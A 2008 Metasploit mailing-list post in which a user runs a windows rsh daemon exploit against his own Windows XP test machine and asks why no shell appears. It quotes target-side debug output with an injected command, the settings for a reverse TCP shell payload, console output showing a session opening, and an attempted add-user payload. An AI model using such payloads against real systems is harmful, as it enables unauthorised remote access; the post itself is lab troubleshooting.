[framework] easy one to answer: getting started on windows rsh daemon exploit
Timothy McGuire
tim.e.mcguire at gmail.com
Thu May 15 20:30:02 CDT 2008
I installed rsh daemon version 1.8 on an old machine of mine (Windows XP
SP2) for testing.
I am running rsh daemon in debug mode. Here is what I see on the target
machine:
Client Port: 1002...
[15] Sending null byte result...
[15] Executing '#r+e}83 ..... etc, etc, etc, etc ....... PAA
>C:\DOCUME~1\myname\LOCALS~1\temp\s648.m
2>C:\DOCUME~1\myname\LOCALS~1\Temp\s648.n'...
> was unexpected at this time.
[15] sending results...
*** [15] ERROR: Cannot open temporary file...
[15] Winsock error: Error number = 12.
My settings:
payload = shell_reverse_tcp
CPORT = 1008
In the Metasploit console, I see:
[*] Started bind handler
[*] Trying target Windows XP Pro SP2 English...
[*] Command shell session 6 opened (00.00.00.104:52294 -> 00.00.00.106:1021)
And then it gives me back the msf exploit (windows_rsh) prompt.
It seems like it worked, but I'm not seeing a shell. Should there be one?
Should I be focusing on the errors I see on the remote machine?
Later, I tried the install user payload; I saw an error that the password
did not meet complexity standards.
After that, rshd fell down and couldn't get back up.
Thanks for any insight.